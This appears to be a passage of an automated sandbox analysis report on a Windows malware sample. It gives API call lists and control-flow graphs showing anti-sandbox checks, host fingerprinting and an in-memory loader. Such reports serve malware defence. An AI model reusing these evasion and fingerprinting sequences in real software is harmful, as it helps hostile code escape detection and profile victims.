                                        • Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,02EB2270,?,004210F4,?,00000000), ref: 0041AB3B
                                        • Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95
                                        • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415894
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004158F1
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415AA7
                                        • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                        • Part of subcall function 00415440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415478
                                        • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                        • Part of subcall function 00415510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415568
                                        • Part of subcall function 00415510: lstrlenA.KERNEL32(00000000), ref: 0041557F
                                        • Part of subcall function 00415510: StrStrA.SHLWAPI(00000000,00000000), ref: 004155B4
                                        • Part of subcall function 00415510: lstrlenA.KERNEL32(00000000), ref: 004155D3
                                        • Part of subcall function 00415510: strtok.MSVCRT(00000000,?), ref: 004155EE
                                        • Part of subcall function 00415510: lstrlenA.KERNEL32(00000000), ref: 004155FE
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004159DB
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415B90
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415C5C
                                      • Sleep.KERNEL32(0000EA60), ref: 00415C6B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpylstrlen$Sleepstrtok
                                      • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                      • API String ID: 3630751533-2791005934
                                      • Opcode ID: 93186e085ff129a73f9e0ab74c49d77d7277fa139757a84e451318394f26fa84
                                      • Instruction ID: 55671caa9f17e02bf2b096751d64d2e50591885947f125be0164830bf8637258
                                      • Opcode Fuzzy Hash: 93186e085ff129a73f9e0ab74c49d77d7277fa139757a84e451318394f26fa84
                                      • Instruction Fuzzy Hash: 30E1A331A111049BCB14FBA1EDA6EED733EAF54304F40856EF50666091EF386B98CB5A

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1592 417690-4176da GetWindowsDirectoryA 1593 4176e3-417757 GetVolumeInformationA call 418e90 * 3 1592->1593 1594 4176dc 1592->1594 1601 417768-41776f 1593->1601 1594->1593 1602 417771-41778a call 418e90 1601->1602 1603 41778c-4177a7 GetProcessHeap HeapAlloc 1601->1603 1602->1601 1605 4177a9-4177b6 call 41aa50 1603->1605 1606 4177b8-4177e8 wsprintfA call 41aa50 1603->1606 1613 41780e-41781e 1605->1613 1606->1613
                                      APIs
                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004176D2
                                      • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041770F
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417793
                                      • HeapAlloc.KERNEL32(00000000), ref: 0041779A
                                      • wsprintfA.USER32 ref: 004177D0
                                        • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                      • String ID: :$C$\
                                      • API String ID: 3790021787-3809124531
                                      • Opcode ID: 39db56893d369c74f5f4f3db1860a6a0fb8aa9103e681a18a70390936e9ddc23
                                      • Instruction ID: 56630df3f9a1121e358c86d43682af9e85f8bbcd47ea8763ba8f74f533c9f43c
                                      • Opcode Fuzzy Hash: 39db56893d369c74f5f4f3db1860a6a0fb8aa9103e681a18a70390936e9ddc23
                                      • Instruction Fuzzy Hash: 8541B6B1D05358DBDB10DF94CC45BDEBBB8AF48704F10009AF509A7280D7786B84CBA9

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1614 418290-4182f1 GetProcessHeap HeapAlloc call 418b40 GlobalMemoryStatusEx 1617 4182f3-41831b call 41dd30 * 2 1614->1617 1618 41831d-418324 1614->1618 1620 41832b-418373 wsprintfA 1617->1620 1618->1620
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,02EB5870,00000000,?,00420E14,00000000,?,00000000), ref: 004182C0
                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,02EB5870,00000000,?,00420E14,00000000,?,00000000,00000000), ref: 004182C7
                                      • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 004182E8
                                      • __aulldiv.LIBCMT ref: 00418302
                                      • __aulldiv.LIBCMT ref: 00418310
                                      • wsprintfA.USER32 ref: 0041833C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
                                      • String ID: %d MB$@
                                      • API String ID: 2886426298-3474575989
                                      • Opcode ID: d0391a1658ec30498705cc8c9cee2c4097af9c2ce960180bd43284ebda5957a4
                                      • Instruction ID: 389ef6515a1f2427be64b00d9458de7be2b91b0079cd17c5d853587b1d371e56
                                      • Opcode Fuzzy Hash: d0391a1658ec30498705cc8c9cee2c4097af9c2ce960180bd43284ebda5957a4
                                      • Instruction Fuzzy Hash: 8B214AF1E44218ABDB00DFD5DD49FAEBBB9FB44B04F10450AF615BB280D77969008BA9

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1625 48c003c-48c0047 1626 48c004c-48c0263 call 48c0a3f call 48c0e0f call 48c0d90 VirtualAlloc 1625->1626 1627 48c0049 1625->1627 1642 48c028b-48c0292 1626->1642 1643 48c0265-48c0289 call 48c0a69 1626->1643 1627->1626 1645 48c02a1-48c02b0 1642->1645 1647 48c02ce-48c03c2 VirtualProtect call 48c0cce call 48c0ce7 1643->1647 1645->1647 1648 48c02b2-48c02cc 1645->1648 1654 48c03d1-48c03e0 1647->1654 1648->1645 1655 48c0439-48c04b8 VirtualFree 1654->1655 1656 48c03e2-48c0437 call 48c0ce7 1654->1656 1658 48c04be-48c04cd 1655->1658 1659 48c05f4-48c05fe 1655->1659 1656->1654 1661 48c04d3-48c04dd 1658->1661 1662 48c077f-48c0789 1659->1662 1663 48c0604-48c060d 1659->1663 1661->1659 1667 48c04e3-48c0505 LoadLibraryA 1661->1667 1665 48c078b-48c07a3 1662->1665 1666 48c07a6-48c07b0 1662->1666 1663->1662 1668 48c0613-48c0637 1663->1668 1665->1666 1669 48c086e-48c08be LoadLibraryA 1666->1669 1670 48c07b6-48c07cb 1666->1670 1671 48c0517-48c0520 1667->1671 1672 48c0507-48c0515 1667->1672 1673 48c063e-48c0648 1668->1673 1677 48c08c7-48c08f9 1669->1677 1674 48c07d2-48c07d5 1670->1674 1675 48c0526-48c0547 1671->1675 1672->1675 1673->1662 1676 48c064e-48c065a 1673->1676 1678 48c0824-48c0833 1674->1678 1679 48c07d7-48c07e0 1674->1679 1680 48c054d-48c0550 1675->1680 1676->1662 1681 48c0660-48c066a 1676->1681 1684 48c08fb-48c0901 1677->1684 1685 48c0902-48c091d 1677->1685 1683 48c0839-48c083c 1678->1683 1686 48c07e4-48c0822 1679->1686 1687 48c07e2 1679->1687 1688 48c0556-48c056b 1680->1688 1689 48c05e0-48c05ef 1680->1689 1682 48c067a-48c0689 1681->1682 1692 48c068f-48c06b2 1682->1692 1693 48c0750-48c077a 1682->1693 1683->1669 1694 48c083e-48c0847 1683->1694 1684->1685 1686->1674 1687->1678 1690 48c056d 1688->1690 1691 48c056f-48c057a 1688->1691 1689->1661 1690->1689 1695 48c057c-48c0599 1691->1695 1696 48c059b-48c05bb 1691->1696 1697 48c06ef-48c06fc 1692->1697 1698 48c06b4-48c06ed 1692->1698 1693->1673 1699 48c0849 1694->1699 1700 48c084b-48c086c 1694->1700 1708 48c05bd-48c05db 1695->1708 1696->1708 1702 48c06fe-48c0748 1697->1702 1703 48c074b 1697->1703 1698->1697 1699->1669 1700->1683 1702->1703 1703->1682 1708->1680
                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 048C024D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID: cess$kernel32.dll
                                      • API String ID: 4275171209-1230238691
                                      • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                      • Instruction ID: bd9e77228a92fd0b16ef38f927e9806ca237c2a912bb725c33ce2dfc6e2dd51a
                                      • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                      • Instruction Fuzzy Hash: 9F527A74A01229DFDB64CF98C984BACBBB1BF09304F1485D9E50DAB351DB30AA85DF15
                                      APIs
                                        • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,02E38E68), ref: 00419BF1
                                        • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,02E38E50), ref: 00419C0A
                                        • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,02E38E98), ref: 00419C22
                                        • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,02E38E80), ref: 00419C3A
                                        • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,02E38DD8), ref: 00419C53
                                        • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,02EB05F8), ref: 00419C6B
                                        • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,02E32668), ref: 00419C83
                                        • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,02E32688), ref: 00419C9C
                                        • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,02E38DF0), ref: 00419CB4
                                        • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,02E38E08), ref: 00419CCC
                                        • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,02E38E20), ref: 00419CE5
                                        • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,02E38E38), ref: 00419CFD
                                        • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,02E32568), ref: 00419D15
                                        • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,02EB1EF0), ref: 00419D2E
                                        • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                        • Part of subcall function 004011D0: ExitProcess.KERNEL32 ref: 00401211
                                        • Part of subcall function 00401160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416CB7,00420AF3), ref: 0040116A
                                        • Part of subcall function 00401160: ExitProcess.KERNEL32 ref: 0040117E
                                        • Part of subcall function 00401110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416CBC), ref: 0040112B
                                        • Part of subcall function 00401110: VirtualAllocExNuma.KERNEL32(00000000,?,?,00416CBC), ref: 00401132
                                        • Part of subcall function 00401110: ExitProcess.KERNEL32 ref: 00401143
                                        • Part of subcall function 00401220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                        • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
                                        • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
                                        • Part of subcall function 00401220: ExitProcess.KERNEL32 ref: 00401294
                                        • Part of subcall function 00416A10: GetUserDefaultLangID.KERNEL32(?,?,00416CC6,00420AF3), ref: 00416A14
                                      • GetUserDefaultLCID.KERNEL32 ref: 00416CC6
                                        • Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011C6
                                        • Part of subcall function 004179E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417A10
                                        • Part of subcall function 004179E0: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417A17
                                        • Part of subcall function 004179E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00417A2F
                                        • Part of subcall function 00417A70: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416CCB), ref: 00417AA0
                                        • Part of subcall function 00417A70: HeapAlloc.KERNEL32(00000000,?,?,?,00416CCB), ref: 00417AA7
                                        • Part of subcall function 00417A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00417ABF
                                        • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                        • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                        • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                        • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,02EB2270,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 00416D6A
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416D88
                                      • CloseHandle.KERNEL32(00000000), ref: 00416D99
                                      • Sleep.KERNEL32(00001770), ref: 00416DA4
                                      • CloseHandle.KERNEL32(?,00000000,?,02EB2270,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 00416DBA
                                      • ExitProcess.KERNEL32 ref: 00416DC2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleName__aulldiv$ComputerCreateCurrentGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                      • String ID:
                                      • API String ID: 3511611419-0
                                      • Opcode ID: 32fb34536166014d7c58d27a16746fd28ebf0fa137deb214c181cbfce6898861
                                      • Instruction ID: 27cf1f4c78a26a12fad1801110170cb785a0876a7ac7b1f74ab5ff3c6832b849
                                      • Opcode Fuzzy Hash: 32fb34536166014d7c58d27a16746fd28ebf0fa137deb214c181cbfce6898861
                                      • Instruction Fuzzy Hash: CB315E30A05104ABCB04FBF1EC56BEE7379AF44314F50492FF11266196EF786A85C66E
                                      APIs
                                      • RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 004185B6
                                      • wsprintfA.USER32 ref: 004185E9
                                      • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0041860B
                                      • RegCloseKey.ADVAPI32(00000000), ref: 0041861C
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00418629
                                        • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                      • RegQueryValueExA.KERNEL32(00000000,02EB57E0,00000000,000F003F,?,00000400), ref: 0041867C
                                      • lstrlenA.KERNEL32(?), ref: 00418691
                                      • RegQueryValueExA.KERNEL32(00000000,02EB5828,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00420B3C), ref: 00418729
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00418798
                                      • RegCloseKey.ADVAPI32(00000000), ref: 004187AA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                      • String ID: %s\%s
                                      • API String ID: 3896182533-4073750446
                                      • Opcode ID: b35235786b948e0e6555158c1c0efb0b11028fcec8c55c6120cd3185db22f78a
                                      • Instruction ID: 130e8712b2d17d0f4a3aa70f9b32a38deb323cc32c4c6a80807e33934adfa5f1
                                      • Opcode Fuzzy Hash: b35235786b948e0e6555158c1c0efb0b11028fcec8c55c6120cd3185db22f78a
                                      • Instruction Fuzzy Hash: 0F211B71A112189BDB24DB54DC85FE9B3B9FB48704F1081D9E609A6180DF746AC5CF98
                                      APIs
                                      • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
                                      • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
                                      • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
                                      • lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
                                      • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ??2@$CrackInternetlstrlen
                                      • String ID: <
                                      • API String ID: 1683549937-4251816714
                                      • Opcode ID: 994daec21f0517629ae22a04d51c011e227e96814832a9a45039b376b6c0c140
                                      • Instruction ID: 160db8237089610cf3963e488d7c28046b69bb3d6c402c1973a99714a059ae02
                                      • Opcode Fuzzy Hash: 994daec21f0517629ae22a04d51c011e227e96814832a9a45039b376b6c0c140
                                      • Instruction Fuzzy Hash: 9F2149B1D00219ABDF14DFA5EC4AADD7B75FF04320F008229F925A7290EB706A19CF95
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417834
                                      • HeapAlloc.KERNEL32(00000000), ref: 0041783B
                                      • RegOpenKeyExA.KERNEL32(80000002,02E38558,00000000,00020119,00000000), ref: 0041786D
                                      • RegQueryValueExA.KERNEL32(00000000,02EB55E8,00000000,00000000,?,000000FF), ref: 0041788E
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00417898
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocCloseOpenProcessQueryValue
                                      • String ID: Windows 11
                                      • API String ID: 3466090806-2517555085
                                      • Opcode ID: ece6f01e7d5fd4039499d2cf589e258aec5fff7bd7b06dda1c9cbde8cad395cd
                                      • Instruction ID: 90abcce2ecfc2a5b8cd512a74185dd25ab23219ddadcc09848e79f4871c60c5e
                                      • Opcode Fuzzy Hash: ece6f01e7d5fd4039499d2cf589e258aec5fff7bd7b06dda1c9cbde8cad395cd
                                      • Instruction Fuzzy Hash: FD01A274E09304BBEB00DBE4ED49FAE7779EF48700F00419AFA04A7290E7749A40CB55
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004178C4
                                      • HeapAlloc.KERNEL32(00000000), ref: 004178CB
                                      • RegOpenKeyExA.KERNEL32(80000002,02E38558,00000000,00020119,00417849), ref: 004178EB
                                      • RegQueryValueExA.KERNEL32(00417849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0041790A
                                      • RegCloseKey.ADVAPI32(00417849), ref: 00417914
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocCloseOpenProcessQueryValue
                                      • String ID: CurrentBuildNumber
                                      • API String ID: 3466090806-1022791448
                                      • Opcode ID: 14ae58864b366c4003c6da9e1b5cfb2a16c067edbf69ef05e192f5cb5c601d9e
                                      • Instruction ID: 4c9302de3449b24d107dc6acc84b9b99571be3b3dcaa7f8b3677a924de38e7e6
                                      • Opcode Fuzzy Hash: 14ae58864b366c4003c6da9e1b5cfb2a16c067edbf69ef05e192f5cb5c601d9e
                                      • Instruction Fuzzy Hash: 51014FB5E45309BBEB00DBE4DC4AFAEB779EF44700F10459AF605A6281E774AA408B91
                                      APIs
                                      • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                      • __aulldiv.LIBCMT ref: 00401258
                                      • __aulldiv.LIBCMT ref: 00401266
                                      • ExitProcess.KERNEL32 ref: 00401294
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
